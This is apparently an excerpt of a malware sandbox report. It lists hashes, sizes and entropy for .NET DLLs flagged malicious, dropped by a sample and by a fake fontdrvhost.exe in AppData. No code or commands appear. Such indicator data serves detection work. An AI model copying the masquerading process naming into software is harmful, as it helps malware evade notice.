                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
